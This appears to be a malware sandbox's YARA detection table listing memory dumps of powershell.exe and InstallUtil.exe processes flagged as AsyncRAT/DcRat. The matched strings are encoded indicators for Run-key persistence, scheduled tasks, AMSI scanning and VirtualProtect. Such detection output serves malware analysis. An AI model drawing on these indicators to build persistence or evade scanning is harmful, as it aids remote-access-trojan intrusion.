14.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy
6.2.powershell.exe.2464fbe5660.4.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
6.2.powershell.exe.2464fbe5660.4.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x7c58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x7ba3:$s2: L2Mgc2NodGFza3MgL2 0x7b22:$s3: QW1zaVNjYW5CdWZmZXI 0x7b70:$s4: VmlydHVhbFByb3RlY3Q
6.2.powershell.exe.2464fbe5660.4.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x7eda:$q1: Select * from Win32_CacheMemory 0x7f1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x7f68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x7fb6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.powershell.exe.2464fbe5660.4.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0x8352:$s1: DcRatBy
6.2.powershell.exe.2464f298700.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
6.2.powershell.exe.2464f298700.0.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x7c58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x7ba3:$s2: L2Mgc2NodGFza3MgL2 0x7b22:$s3: QW1zaVNjYW5CdWZmZXI 0x7b70:$s4: VmlydHVhbFByb3RlY3Q
6.2.powershell.exe.2464f298700.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x7eda:$q1: Select * from Win32_CacheMemory 0x7f1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x7f68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x7fb6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.powershell.exe.2464f298700.0.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0x8352:$s1: DcRatBy
11.2.powershell.exe.1d38e8b7a20.5.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
11.2.powershell.exe.1d38e8b7a20.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.powershell.exe.1d38e8b7a20.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q
11.2.powershell.exe.1d38e8b7a20.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
11.2.powershell.exe.1d38e8b7a20.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy
6.2.powershell.exe.2464fbc0f38.2.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
6.2.powershell.exe.2464fbc0f38.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.powershell.exe.2464fbc0f38.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q
6.2.powershell.exe.2464fbc0f38.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.powershell.exe.2464fbc0f38.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy
17.0.InstallUtil.exe.400000.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
17.0.InstallUtil.exe.400000.2.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.0.InstallUtil.exe.400000.2.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q
17.0.InstallUtil.exe.400000.2.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
17.0.InstallUtil.exe.400000.2.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy
11.2.powershell.exe.1d38e50f5c8.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
11.2.powershell.exe.1d38e50f5c8.2.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x7c58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x7ba3:$s2: L2Mgc2NodGFza3MgL2 0x7b22:$s3: QW1zaVNjYW5CdWZmZXI 0x7b70:$s4: VmlydHVhbFByb3RlY3Q
11.2.powershell.exe.1d38e50f5c8.2.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x7eda:$q1: Select * from Win32_CacheMemory 0x7f1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x7f68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x7fb6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
11.2.powershell.exe.1d38e50f5c8.2.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0x8352:$s1: DcRatBy
17.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
17.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q
17.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
17.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy
14.0.InstallUtil.exe.400000.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
14.0.InstallUtil.exe.400000.1.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.0.InstallUtil.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q
14.0.InstallUtil.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
14.0.InstallUtil.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy
17.0.InstallUtil.exe.400000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
17.0.InstallUtil.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.0.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q
17.0.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
17.0.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy
14.0.InstallUtil.exe.400000.3.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
14.0.InstallUtil.exe.400000.3.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.0.InstallUtil.exe.400000.3.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q
14.0.InstallUtil.exe.400000.3.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
14.0.InstallUtil.exe.400000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy
14.0.InstallUtil.exe.400000.4.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
14.0.InstallUtil.exe.400000.4.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.0.InstallUtil.exe.400000.4.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q
14.0.InstallUtil.exe.400000.4.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
14.0.InstallUtil.exe.400000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy
14.0.InstallUtil.exe.400000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
14.0.InstallUtil.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.0.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q
14.0.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
14.0.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy
14.0.InstallUtil.exe.400000.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
14.0.InstallUtil.exe.400000.2.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.0.InstallUtil.exe.400000.2.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q
14.0.InstallUtil.exe.400000.2.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
14.0.InstallUtil.exe.400000.2.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy
6.2.powershell.exe.2464f298700.0.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
6.2.powershell.exe.2464f298700.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.powershell.exe.2464f298700.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x278d10:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x278c5b:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x278bda:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q 0x278c28:$s4: VmlydHVhbFByb3RlY3Q
6.2.powershell.exe.2464f298700.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x278f92:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x278fd2:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x279020:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x27906e:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.powershell.exe.2464f298700.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy 0x27940a:$s1: DcRatBy
11.2.powershell.exe.1d38e8aba40.4.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
11.2.powershell.exe.1d38e8aba40.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.powershell.exe.1d38e8aba40.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x15a38:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x15983:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x15902:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q 0x15950:$s4: VmlydHVhbFByb3RlY3Q
11.2.powershell.exe.1d38e8aba40.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x15cba:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x15cfa:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x15d48:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x15d96:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
11.2.powershell.exe.1d38e8aba40.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy 0x16132:$s1: DcRatBy
11.2.powershell.exe.1d38e3e6138.0.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
11.2.powershell.exe.1d38e3e6138.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.powershell.exe.1d38e3e6138.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x132ee8:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x3a21a0:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x132e33:$s2: L2Mgc2NodGFza3MgL2 0x3a20eb:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x132db2:$s3: QW1zaVNjYW5CdWZmZXI 0x3a206a:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q 0x132e00:$s4: VmlydHVhbFByb3RlY3Q 0x3a20b8:$s4: VmlydHVhbFByb3RlY3Q
11.2.powershell.exe.1d38e3e6138.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x13316a:$q1: Select * from Win32_CacheMemory 0x3a2422:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x1331aa:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x3a2462:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x1331f8:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x3a24b0:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x133246:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x3a24fe:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
11.2.powershell.exe.1d38e3e6138.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy 0x1335e2:$s1: DcRatBy 0x3a289a:$s1: DcRatBy
11.2.powershell.exe.1d38e50f5c8.2.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
11.2.powershell.exe.1d38e50f5c8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.powershell.exe.1d38e50f5c8.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x278d10:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x278c5b:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x278bda:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q 0x278c28:$s4: VmlydHVhbFByb3RlY3Q
11.2.powershell.exe.1d38e50f5c8.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x278f92:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x278fd2:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x279020:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x27906e:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
11.2.powershell.exe.1d38e50f5c8.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy 0x27940a:$s1: DcRatBy
6.2.powershell.exe.2464fbe5660.4.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
6.2.powershell.exe.2464fbe5660.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.powershell.exe.2464fbe5660.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q
6.2.powershell.exe.2464fbe5660.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.powershell.exe.2464fbe5660.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy
11.2.powershell.exe.1d38e3da290.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
11.2.powershell.exe.1d38e3da290.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.powershell.exe.1d38e3da290.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x15900:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x13ed90:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x3ae048:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x1584b:$s2: L2Mgc2NodGFza3MgL2 0x13ecdb:$s2: L2Mgc2NodGFza3MgL2 0x3adf93:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x157ca:$s3: QW1zaVNjYW5CdWZmZXI 0x13ec5a:$s3: QW1zaVNjYW5CdWZmZXI 0x3adf12:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q 0x15818:$s4: VmlydHVhbFByb3RlY3Q 0x13eca8:$s4: VmlydHVhbFByb3RlY3Q 0x3adf60:$s4: VmlydHVhbFByb3RlY3Q
